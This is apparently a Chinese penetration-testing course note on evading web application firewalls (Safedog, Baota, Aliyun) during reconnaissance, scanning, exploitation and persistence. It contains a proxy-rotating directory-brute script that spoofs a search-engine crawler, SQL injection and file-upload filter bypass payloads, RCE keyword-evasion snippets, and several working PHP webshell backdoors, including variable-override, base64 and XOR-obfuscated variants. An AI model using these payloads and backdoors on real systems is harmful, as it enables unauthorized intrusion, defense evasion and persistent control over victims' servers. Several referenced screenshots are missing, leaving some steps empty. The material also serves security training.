WAF绕过“小迪安全课堂笔记”信息收集，漏洞发现，漏洞利用，权限控制

思维导图(全)

CC 攻击与 DDOS CC

攻击就是 DDOS 攻击的一种攻击类型。CC 攻击是它的一种攻击方式。
CC 攻击模拟多个用户(多少线程就是多少用户)不停地进行访问(访问那些需要大 量数据操作，就是需要大量 CPU 时间的页面).这一点用一个一般的性能测试软件 就可以做到大量模拟用户并发。CC 攻击的原理就是攻击者控制某些主机不停地 发大量数据包给对方服务器造成服务器资源耗尽，一直到宕机崩溃。
dos 攻击指借助于客户/服务器技术，将多个计算机联合起来作为攻击平台，对一 个或多个目标发动攻击，从而成倍地提高拒绝服务攻击的威力。ddos 的攻击方 式有很多种，最基本的 dos 攻击就是利用合理的服务请求来占用过多的服务资 源，从而使合法用户无法得到服务的响应。
ddos 攻击和 cc 攻击区别主要是针对对象的不同。是主要针对 IP 的攻击，而 CC 攻击的主要是网页。CC 攻击相对来说，攻击的危害不是毁灭性的，但是持续时 间长;而 ddos 攻击就是流量攻击，这种攻击的危害性较大，通过向目标服务器发 送大量数据包，耗尽其带宽，更难防御。

WAF 绕过-信息收集之反爬虫延时代理池技术

信息收集是WAF绕过的第一步，若是信息收集出现问题，那么接下来的步骤不好进行。从而可以看出信息收集的重要 性。在测试过程中每一步都可能被拦截，所以我们要学习每一部分的一些绕过手法。 我们的测试环境为 阿里云、宝塔和安全狗。

那么直接网站进行信息收集时，会触发WAF，但这些信息还是我们需要知道的（例如：目录扫描，从而得到敏感文件， 上传地址等等），这是在信息收集部分中非常重要的一部分。从而就需要我们绕过WAF从而得到这些信息。

这一部分会触发WAF拦截，所以我们需要分析它的规则，这就需要我们进行绕过分析（抓包分析**，**WAF说明， FUZZ测试）。然后我们根据他的结果来想相应的绕过手法。

案例

Safedog-默认拦截机制分析绕过-未开CC

先对目标网站进行扫描

发现都存在，但其实这是一种误报。这时就给人了一种错觉，感觉它存在但其实它不存在。这时对于我们扫描文件带来了不便。

那我们此时手工访问一下网站，看看是什么情况
当我们访问存在的文件时，返回200

当我们访问不存在的文件时返回404

以看出此时是没有问题的，那么为什么使用工具会出现误报呢？我们再来从数据包的层面来分析一下。
使用工具抓到目录扫描工具进程的数据包

然后再看下浏览器访问时产生的数据包。

再进行对比

可以明确的看到这两个数据包的不同
所以我们更改工具的数据包，使其尽量贴合使用浏览器访问时产生的数据包。

更改工具的请求方式，使用GET方式请求数据。
第二次使用GET方法请求时可以发现没有误报的情况产生了。

测试一下文件是否存在


发现文件正常存在。
那么我们可以看到这款工具的优势：

可以看到三点：第一点

第二点：

第三点：

这就是使用工具绕过的思路：模拟用户的真实访问数据包去请求真实网站。
接下来我们开启安全狗的CC防护


开启安全狗的CC防护后，重启phpstudy。
再次尝试使用工具扫描

发现又开始产生误报了。
此时查看网站，发现已经被安全狗拦截了。

CC检测你的访问速度和访问来源，CC此时拦截是安全狗检测到你此时的访问不正常(这里是访问速度过快了)，不像是正常的用户访问，就会拦截。

那么此时的绕过思路就是要符合用户的访问习惯保持一致
用户的访问速度肯定是没有工具的访问速度快的，那么这个工具过快，就可以采用演示扫描，此时的访问速度需要自己测(在保证速度的同时也能保证结果)

第一步是基于数据包的特征，这里使用的是更改请求方式和模拟用户。

请求方式： 就是更改请求方式，去请求数据。例如：Head方式改为GET方式请求数据。
模拟用户： 将使用工具请求网站所提交的数据包尽可能的像用户使用浏览器访问所提交的数据包。
爬虫引擎： 这个不是通用的，这个属于部分WAF上面的一个特有的性值。WAF上面有黑白名单机制：在网站中加入到黑名单就代表禁止访问。白名单就是不进行拦截，符合规则可以任意访问。


设置了路径白名单后，这个目录下的攻击就不会被拦截。

处在白名单中的IP用户，任何请求都不会被拦截。
处在黑名单中的IP用户，不管是不是攻击都会被拦截(正常访问也会被拦截)。

爬虫白名单的存在是为了让网站能够正常的被收录，若是将这些爬虫引擎拦截的话，可能会造成网站收入过低、权重、流量等等。
这里爬虫进了该工具的白名单，那么对方是爬虫的请求，那么就不会拦截。

那么如何将自己伪造成为百度搜索引擎，360搜索引擎等等爬虫引擎？
其实是非常简单的，就是修改User-Agent头下面为一些搜索引擎的User-Agent
各大搜索引擎User-Agent：https://www.cnblogs.com/iack/p/3557371.html

更改这个UA头可以模拟爬虫去请求网站。

但是这里有一个问题：可以看到没有任何结果。
我们整理一下思路

先本地测试安全狗-默认拦截-数据包问题(未开cc)
先本地测试安全狗-绕过拦截-更改提交方式或模拟用户
先本地测试安全狗-默认拦截-数据包问题(开cc)
先本地测试安全狗-绕过拦截-延时或代理池或爬虫引擎

更改UA头后发现扫描不出来。

这个工具只能修改UA，所以我们使用python脚本来进行演示

#搜索引擎爬虫模拟及模拟真实用户
import requests
import time
headers={
	'Connection': 'keep-alive',
	'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 
	#模拟用户 Kit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 
	#模拟引擎 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html) 
	#更多爬虫引擎：https://www.cnblogs.com/iack/p/3557371.html 
	'User-Agent': 'Mozilla/5.0 (compatible; Baiduspider- render/2.0;+http://www.baidu.com/search/spider.html)', 
	'Sec-Fetch-Dest': 'document', 
	'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,* /*;q=0.8,application/si gned-	exchange;v=b3;q=0.9', 
	'Sec-Fetch-Site': 'none', 
	'Sec-Fetch-Mode': 'navigate', 
	'Sec-Fetch-User': '?1', 
	'Accept-Encoding': 'gzip, deflate, br', 
	'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7', 
	'Cookie': 'xxx',#根据当前访问 cookie 
}
for paths in open('php_b.txt',encoding='utf-8'): #字典与编码
	url='http://192.168.0.103:8081/' #目标
	paths=paths.replace('\n','') 
	urls=url+paths 
	#如需测试加代理，或加入代理池需加代理 
	proxy = { 'http': '127.0.0.1:7777' }
	try: 
		code=requests.get(urls,headers=headers,proxies=proxy).status_code 		print(urls+'|'+str(code)) 
		if code==200 or code==403: 
			print(urls+'|'+str(code)) 
	except Exception as err: 
		print('connecting error') 
		#time.sleep(3)模拟用户需延时 引擎可用可不用（根据请求速度）

本python代码就是模拟用户请求，通过返回的状态码来判断请求是否成功。

设置本地代理，使用burpstite进行代理请求，顺便可以查看数据包。

查看下脚本指定User-Agent后产生的数据包

当我们不指向头时产生的数据包。

可以看到有明显的区别。

写脚本的原因是为了模拟用户真实的访问情况，并且可以对其有充足的控制，使用别人的工具会有无法更改请求内容的问题出现

使用脚本请求网站，刚开始还正常，后来发现均为200


此时产生了误报，原因是开启了CC防护，现在正常访问页面，发现被安全狗拦截了。

那么此时我们采用模拟爬虫的方式来绕过CC拦截，原因是爬虫的请求在白名单中，网站不会对其检测速度。

在这里我们还可以使用代理池技术。

代理池技术:代理就是你的请求先发到代理服务器上，代理服务器再转发给目标服务器。

作用就是当使用其中的一个IP去请求目标网站时被封了，那么可以换另一个IP继续对该网站进行访问。
当对阿里云的服务器扫描时扫的扫的就会找不到网站，原因是阿里云屏蔽了的IP。自带的阿里云防护对于扫描工具防护的比较厉害。

可以看到测试所用的网站现在是可以正常访问的。
开始对网站进行扫描。

可以看到扫描之后网站打不开了，这就是阿里云的防护。（大约需要一个小时后才能打开网站）

那么如何绕过它呢？
阿里云-无法模拟搜索引擎爬虫绕过只能采用代理池或延时

现在上宝塔防护


可以看到常见的扫描工具都被写在了拦截规则里面。

安全狗爬虫，延迟，代理均可绕过
阿里云-无法模拟搜索引擎爬虫绕过只能采用代理池或延时
宝塔-爬虫未知延迟可以代理池可以

三者合一后只能用代理池绕过或延时绕过

日志中会记录到拦截的敏感文件

宝塔也会有安全拦截机制

第二条拦截机制，也就会拦截。所以字典中不能带有像bak之类的。所以绕过防火墙不太好绕过。

那么我还必须要得到这些敏感文件，那么有以下解决方法
1、将字典分开
2、将关键文件名进行变异， 例如：index.php.bak. index.php.bak%20
3、一分钟请求5次

WAF绕过-漏洞发现之代理池指纹被动探针

漏洞发现触发 WAF 点-针对 xray,awvs 等

1.扫描速度-(代理池，延迟，白名单等)
2.工具指纹-(特征修改，伪造模拟真实用户等)
3.漏洞 Payload-(数据变异，数据加密，白名单等)
扫描过快会被拦截，热门工具会被拦截，有关键字也会触发WAF。

案例

代理池

代理池 Proxy_pool 项目搭建及使用解释

proxy_pool：https://github.com/jhao104/proxy_pool
代理池Proxy_pool项目不太稳定，建议直接上充钱代理。

下载后需要配置以下地方：
1、setting.py下的server config

2、database config下的redis的账号密码

还需安装一些python所需要的库文件：

具体操作从网上自行查找
使用Redis数据库连接工具连接Redis数据库

点击连接，填写账号密码。

可以看到当前数据库内无任何数据

接下来启动文件

还需启动API服务

接下来访问工具给出的127.0.0.1即可得到一个随机IP 在pycharm中打开的到代理。

充钱代理池直接干safedog+BT+Aliyun探针

代理池地址：https://www.kuaidaili.com/ 选择付费
在无代理的情况下扫描网站xiaodi8.com。

开始出现错误信息

可以看到网站打不开了

现在我们使用付费的代理

选择每次请求换IP，阿里云半分钟左右就会封IP 所以选择每分钟换代理。

只需要在脚本处写上代理网站端口即可

在测试之前可以看到测试网站可以正常访问。

现在采用代理对目标进行探针

可以看到，探针的速度是很快的，而且网站也可以正常访问


可以看到BT拦截了代理IP，并不拦截攻击机。所以并不怕封IP。
此时还可以继续对目标网站进行扫描。

速度上面没有任何问题， 接下来看漏扫工具。

Safedog-awvs 漏扫注入测试绕过-延时,白名单

先在本地对安全狗进行绕过
不对awvs做任何配置，直接开扫。

现在网站可以正常访问

安全狗进行了拦截

使用burp suite进行代理转发并且查看数据包。可以看到扫描器所产生的请求数据包是很多的。

现在将扫描速度改为慢，继续进行扫描，看安全狗会不会进行拦截。

此时的数据包请求就很慢，1两秒钟再请求，此时安全狗就不会拦截，漏洞还在探针，时间会长一些。

现在采用模仿爬虫引擎进行探针，扫描速度设置为快

现在发现速度快也不会被拦截，漏洞正常扫描，网站不会被拦截。修改UA头只针对安全狗。

所以针对安全狗采用延时和白名单
(Xray可以扫描BT，原因是BT没有集成它的指纹)

BT(baota)-awvs+xray 漏扫 Payload 绕过-延时被动

扫描工具尽量使用多种工具
注入点
and 1=1 awvs注入拦截 判断点失效
or 1=1 Xray注入
xor 1=1 appscan注入

当扫描器的测试语句触发WAF规则后，该工具就可能会跑不出漏洞。每个工具的验证漏洞的方式不一样所以测试的时候需要多款工具。
并不是所有工具都可以控制速度，这就需要burpsuite作为中转来控制速度。

使用人工的方式不停的放包，但这样比较繁琐，可以使用按键精灵来放包。速度问题是首要解决问题，然后是工具的指纹。
使用工具组合扫描。
awvs+xray漏扫Payload绕过-延时白名单
burpsuite作为中转
awvs设置：

Xray设置：

burpsuite设置：

这就是工具的联动：

awvs控制UA头和扫描速度
Xray和awvs数据包会保持同步
burpsute查看数据包详细内容，查看数据包请求速度。

或是使用代理池进行漏洞扫描


需要绕过安全狗，BT，阿里云的限制，所以过狗不好过啊。

最终成功探测出漏洞。

WAF 绕过-漏洞利用之注入上传跨站等绕过

SQL注入-WAF绕过

手工注入绕过

①敏感字符绕过

如union，orderyby等相关关键字
使用/**/(注释)绕过WAF对敏感字段的查询如database();如database后使用database/**/

②联合绕过
%23代表#
%0A代表一个换行符
union%23a%0Aselect1,2,3;%23

如：
①id=1%20union%23a%0Aselect1,2,3;%23
②id=1/**&id=-1%20union%20select%201,2,3%23*/
③id=1%20union/!44509select/%201,2,3 （大于 4.4509 版本运行） /!x/ 代表当mysql数据库版本大于x时, mysql 不再当作注释，从而将其运行，这是mysql的特性。

Sqlmap 工具绕过

①绕过指纹识别
需要伪装 UA（–user-agent="Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"或者–random-agent）， 或者修改 sqlmap 下自带的 sqlmap.conf 文件下的 agent 也可达到效果。

②绕过敏感字段识别
用到自带模块（–tamper=rdog.py ）
③绕过 CC 防护
用上代理池（–proxy=http:/IP:port）

宝塔基础上绕过

BTWAF 会对/*关键字进行拦截，所以在上述的基础上想绕过 BT 就需要使用截断 技术，故在每个/*前面加上%00 即可绕过了

截断条件

1. PHP 版本小于 5.3.4
2. php.ini 中的 magic_quotes_gpc 设置为 Off

magic_quotes_gpc 函数在 php 中的作用是判断解析用户提示的数据，如包括有:post、 get、cookie 过来的数据增加转义字符“\”，以确保这些数据不会引起程序，特别是数据 库语句因为特殊字符引起的污染而出现致命的错误。

文件上传-WAF 绕过

①数据溢出
WAF 一般检测上传参数的位置，所以在上传参数构造垃圾数据使其溢出 垃圾数据写入的位置：最后以分号结尾
箭头位置是填充垃圾数据用的，为了更加清楚，下图未添加垃圾数据

②符号变异
就是在抓包中修改filename的值，将filename中的一个双引号去除使得waf无法获取双引号的内容，从而无法检测出执行文本，达到绕过的效果。利用的是双引号里的是一个字符串，但是当我们把一个双引号去除后，就会变成了一个变量或其它值，从而不再变成一个字符串被WAF所检测到。

③分号绕过
由于分号代表一个语句的结束，所以当我们使用分号后，WAF检测到的是x.jpg文件名，对于后面的文件被忽略了也就没检测到，使得绕过了。

④换行绕过
利用WAF读取换行时为\n，而数据包却能完整的去读出来换行
如下：WAF读取到的为filename为x.\np\nh\np从而WAF无法获取到php的执行文件达到绕过效果

⑤重复数据
1、借助原有数据绕过
利用content-Disposition:from-data;name=”upload_file”;的值带入filename中,从而使得WAF在检测时直接检测到filename为content-Disposition:from-data;name=”upload_file”;从而作为白名单而绕过了WAF而服务器接收到的确实x.php。
2、利用白名单绕过
重复构造filename=”.jpg”最后在以filename=”.php”结尾从而利用递归的问题,绕过了WAF,类似前面的文件上传后端部分的双写绕过。

XSS-WAF绕过

手工XSS绕过

1.标签语法替代
2.特殊符号干扰
3.提交方式更改
4.垃圾数据溢出
5.加密解密算法
6.结合其它漏洞绕过

XSStrike工具绕过

使用延时或者代理池绕过CC即可–timeout或者–proxy

模糊测试–fuzzer,该模糊器旨在测试过滤器和Web应用程序防火墙，可使用-d选项将延迟设置为1秒。

RCE-WAF绕过

①加密解密绕过
可逆base64，url编码不可逆md5
注意：不能在可变变量中传入base64_decode()函数因为，会被BT拦截，所以一般该方式行不通就会换成下面的方式。
②关键字绕过
如phpinfo();可以替换成如下写法：

$y=str_replace('x','','pxhpxinxfo()');assert($y);

③提交方法
利用变量覆盖加上请求方法达到该效果，如本来是POST方法，修改后变成GET方法从而达到绕过WAF

$a=$_GET['x'];$$a=$_GET['y'];$b($_POST['z']);

下面的尝试未开启BT，只有safedog的测试

过滤了assert关键字时,利用下面方法达到绕过，原理:就是拼接字符串

WAF 绕过-权限控制之代码混淆及行为造轮子

后门绕过

①简单后门-无法绕过WAF

PHP脚本为例: <?php @eval($_POST['x']);?> <?php assert($_POST['x']);?>

简单后门只是用于简单的学习,而在真实环境中，该后门语句会被直接WAF所检测到，此时就需要我们进行简单的变换。
注意：一般情况下多数用assert函数因为assert能写入变量执行，而eval却不行

②变量覆盖
思路：WAF检测不到可变的变量时，就会放行也就是无法检测到木马后门文件。
后门语句

<?php
	$a = $_GET['x']; 
	$$a = $_GET['y']; 
	$b($_POST['z']); 
?>

利用：
例如：后门文件为 1.php 则，在服务器上使用 http://IP/1.php?x=b&y=assert 即可实现，因为这样赋值后

	$a = b; 
	$$a = $b = assert; 

直接变成了

assert($_POST[‘z’]);

③加密传输
思路：
后门直接调用system|phpinfo等敏感字段时会被BT所拦截，尤其是BT的WAF会拦截/*字符的出现，在绕过时，就需要配合截断(%00)去处理或者相关加密技术。
在上述调用phpinfo()时，是没开启BT的，之开启safedog模式，所以没有出现拦截，一旦开启了BT，就会对特殊的关键词进行拦截。

下面便是BT拦截的相关字段

从而就衍生了加密的方式进行绕过，因为BT只对指定的字段进密方面进行字段上的绕过如典型的可逆的base64编码。

后门语句

<?php
	$a = $_GET['x']; 
	$$a = $_GET['y']; 
	$b(base64_decode($_POST['z'])); 
?>

利用：


注意：在BT里是会变量进行关键词检测的，也就是如果在变量里出现base64字段就会进行拦截，不过此时在这并没有在变量中调用base64，而是后门文件中调用了，所以不拦截。
④加密混淆
思路：既然可以加密传输，就会有其它加密的方法，就有了加密混淆使得WAF软件无法检测到关键字段同样达到WAF的绕过。
PHP混淆加密脚本下载地址：https://github.com/djunny/enphp

后门语句:
目标加密语句:

<?php
	assert(base64_decode($_POST['x']));
?>	

通过命令混淆后如下:
参考命令:D:\phpStudy\PHPTutorial\php\php-5.4.45\php.execode_test.php

WAF依然绕过safedog

利用:

⑤借用在线API接口实现加密混淆
思路:一旦上面的加密混淆过不了安全狗或者BT等其它防护工具时，可以借助网上在线API 接口进行实现加密混淆。
网址：http://phpjiami.com/phpjiami.html

⑥异或加密Webshell-venom
思路：同样也是进行混淆代码，只是与前面两者不同，该方法利用的是异或加密，不断随机的产生不同的代码。
后门语句：

<?php 
class CEKF{
	function __destruct(){
		$SPOE='gK$JP>'^"\x6\x38\x57\x2f\x22\x4a"; 
		return @$SPOE("$this->ZDFP"); 
	} 
}
$cekf=new CEKF(); 
@$cekf->ZDFP=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST[' mr6']; ?>

利用：通过简单观察代码可以发现存在三目运算符，所以当存在 id=1 时，就会使用 base64_decode 解码操作，又因为有 WAF 的存在，不能直接传入敏感字段，所以在 mr6 就进行 base64 编码形式。

权限软件

菜刀，蚁剑，冰蝎优缺点

菜刀：未更新状态，无插件，单向加密传输
蚁剑：更新状态，有插件，拓展性强，单向加密传输
冰蝎：更新状态，未知插件，双向加密传输

单双向加密传输的区别：双向加密传输就是发包之前已经加密了，并且从服务器传回来的数据也是加密的，这样在安全狗这些WAF检测内容的时候就狠 nice。

①菜刀单向加密示例：

抓包分析菜刀执行操作时候的数据包，然后模拟提交，返回了目录列表。

②冰蝎双向加密示例：

双向加密。从而达到WAF也无法检测响应的数据包从而检测到敏感字段而拦截，是相对其他工具来说较好的。

自己造轮子

因为像很多权限工具都被WAF所识别了相关特征（如菜刀、蚁剑、冰蝎等），会导致无法使用权限漏洞去控制相关内容，从而就需要我们通过写入相关函数从而达到想要获取的目的。
如：
显示当前目录下的内容：
var_dump(scandir(‘.’)); 想要获取当前目录下的内容（ 使用 var_dump() 函数 php 环境），就可以调用函数 scandir()并让它输出.
scandir() 函数返回指定目录中的文件和目录的数组
var_dump() 方法是判断一个变量的类型与长度,并输出变量的数值,如果变量 有值输的是变量的值并回返数据类型.此函数显示关于一个或多个表达式的结构 信息，包括表达式的类型与值。数组将递归展开值，通过缩进显示其结构。

下图使用的还是上面异或加密用的后门脚本

写入文件
file_put_contents()
如：写入一个名为helloworld.txt文件内容为worldhello，调用函数file_put_contents(‘helloworld.txt’,‘worldhello’);